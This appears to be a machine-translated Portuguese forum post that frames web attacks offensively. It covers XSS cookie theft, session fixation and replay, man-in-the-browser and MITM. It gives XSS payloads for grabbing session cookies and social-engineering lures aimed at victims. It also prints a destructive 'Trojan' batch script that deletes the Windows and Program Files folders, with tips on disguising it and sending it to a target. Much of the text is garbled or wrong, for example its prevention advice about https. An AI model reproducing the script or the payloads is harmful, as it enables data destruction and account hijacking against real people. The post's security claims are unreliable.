Meus estimados comandantes e circuitos, em primeiro lugar, espero que estejam bem e transmito minha gratidão. O tópico de hoje é como no título, espero que seja útil, boa leitura
Atenciosamente, saudações
XSS (CROSS-SITE Scripting)
Quando há uma vulnerabilidade xss no site, o que pode ser feito com o open fica limitado à imaginação. Exemplos como Facebook, Twitter, Yahoo, Yandex, Adobe, Motorola.
Tipos;
Refletido xss(refletido
Armazenado(armazenado)
Dom(tipo-0)
Refletido xss;
É o tipo menos prejudicial. O motivo será um link que nós mesmos preparamos. Precisamos fazer a outra pessoa aceitar. O motivo é aproveitar de suas fraquezas. Podemos apresentar isso com uma história de engenharia social Pode ser uma história como um aniversário ou clique para ver o extrato de dívidas devido ao imposto que você pagou hoje, depende totalmente da imaginação da pessoa.
Quando entramos em qualquer site, o que nos chama a atenção é o motor de busca do site.
Nosso código; ><script>alert(xss);</script>
Percebemos que havia uma vulnerabilidade xss quando nosso código nos respondeu, agora somos usuários do site, vamos pegar nossos próprios cookies para isso na parte de pesquisa :
><script>alert(document.cookie) ;</script>
Receberemos um comando de aviso na tela como última visita, obter id do convidado. O cookie que vemos são as informações da nossa sessão. Nos ataques xss, a lógica é roubar as informações da sessão da pessoa que visamos e fazer login no sistema com essas informações da sessão.
O xss refletido é a mais difícil das outras vulnerabilidades da Web. Uma injeção de sql não é como um xss armazenado ou injeção. Depende mais da sua imaginação. O principal objetivo aqui será obter informações da sessão (cookie).
Quando olhamos para nossas próprias informações de sessão ><script>alert(document.cookie);</script>
Os dados que encontramos com o comando Alert são nosso cookie, ou seja, nossas informações de sessão dentro do site.
A lógica aqui é roubar as informações da sessão da pessoa alvo e fazer login no sistema com essas informações da sessão.
Quando olhamos para nossas próprias informações de sessão ><script>alert(document.cookie)><script
DOM XSS É
a mais fácil e simples das vulnerabilidades. Porque não salva a entrada inserida diretamente no banco de dados, e os códigos que você escreve na parte de entrada são processados no banco de dados e funcionam no site.
SESSION FIXATION Induzido
a usar um ID de sessão específico (engenharia social) Quando um
invasor encontra a vulnerabilidade, ele pode enganar suas solicitações maliciosas como se fossem feitas pelo proprietário da sessão.
O servidor aceita o ID da sessão e a sessão é preenchida com informações sobre o usuário autenticado (phisphing). O invasor pode então executar ações no aplicativo como se fosse a vítima, transmitindo o ID da sessão comprometida junto com sua solicitação.
Esse ataque é chamado de ataque de fixação de sessão porque o ID da sessão do usuário é prefixado em vez de gerado aleatoriamente no login.
Por exemplo, podemos copiar o protocolo chamado https e realizar uma pesquisa na Internet com um número de conta que você abriu em nosso banco x pessoa. ou quando você enviar um e-mail e clicar no link, podemos obter uma sessão. Por exemplo, você está vendendo eletricidade e gás no exterior. Após a confirmação do e-mail, uma taxa é deduzida automaticamente da conta da pessoa (engenharia social ).
Repetição da Sessão
Você criou uma assinatura em um site, essa informação de login gerada enviará um pacote para o servidor que foi criado, e isso pode ser uma sessão. Se alguém farejar a linha à qual você está conectado enquanto faz isso, este pacote também chegará à mão dessa pessoa. Então, ao sair do sistema, se o invasor enviar o pacote enviado do próprio computador para o servidor, indicando que você está logado, ele obterá autorização no sistema, como se tivesse inserido nosso nome de usuário e senha no é a repetição do pacote, podemos pensar nisso como me dê uma rosa.
Vemos isso principalmente em jogos, por exemplo, em um jogo virtual de 4 jogadores, existe um jogo cujos números vêm aleatoriamente. Em outras palavras, sua chance de acertar 6 na loteria numérica pode permanecer muito alta.
Client Side
significa lado do cliente, mas nesta área, os usuários que desejam visualizar uma página da Web enviam uma solicitação ao servidor e, após essa solicitação, o servidor envia um arquivo html contendo códigos javascript para o navegador. O método pelo qual esses arquivos são processados pelo navegador e o conteúdo da página é renderizado pelo navegador é chamado de renderização do lado do cliente.
Por exemplo, um cliente comprou um produto de você e exige o reembolso do dinheiro.
O que você faz?
Você pediu à sua empresa para encaminhá-lo para sua própria empresa e criar uma petição de solicitação de devolução.
<html>
<cabeça>
<title>helloworld/title>
</head>
<body>
<h1></h1>
<img src="download.png">
<a href=""></a>
</body>
</html>
Podemos criar um site e enviá-lo para a vítima.
Man in the Browser
Um invasor pode instalar um Trojan na pessoa-alvo pela Internet, que pode monitorar o sistema ou criar uma solicitação de atualização de software e obter uma sessão em segundo plano.
Exemplo de código de Trojan
@Echo off
c:windowscommanddeltree/yc:wimdows*.*
@Echo off
c:windowscommanddeltree/yc :progra~1*.*
@Echo off
c:windowscommanddeltree /yc:*.
cls
@Echo .:: Por administrador ::.
@Echo off
Podemos salvar como .bat e salvar como .
Também podemos adicionar uma imagem png a ela, depende da pessoa.
MAN IN THE MIDDLE ATTACK
É um ataque cibernético, o invasor direciona duas pessoas-alvo do usuário para o aplicativo da Web. Ele ou ela pode fazer isso com uma ferramenta de cabo, como se você estivesse navegando na Internet normal obtendo acesso remoto, mas o invasor direciona você, uma espécie de espionagem, mas é semelhante a uma espionagem, mas se você conseguir uma comunicação dupla O invasor permite que eles se comuniquem.
Prevenção Você não pode abrir sites com protocolo https. Não abra e-mails de desconhecidos origem. Certifique-se de evitar a conexão com Wi-Fi aberto. Mantenha os sistemas atualizados
.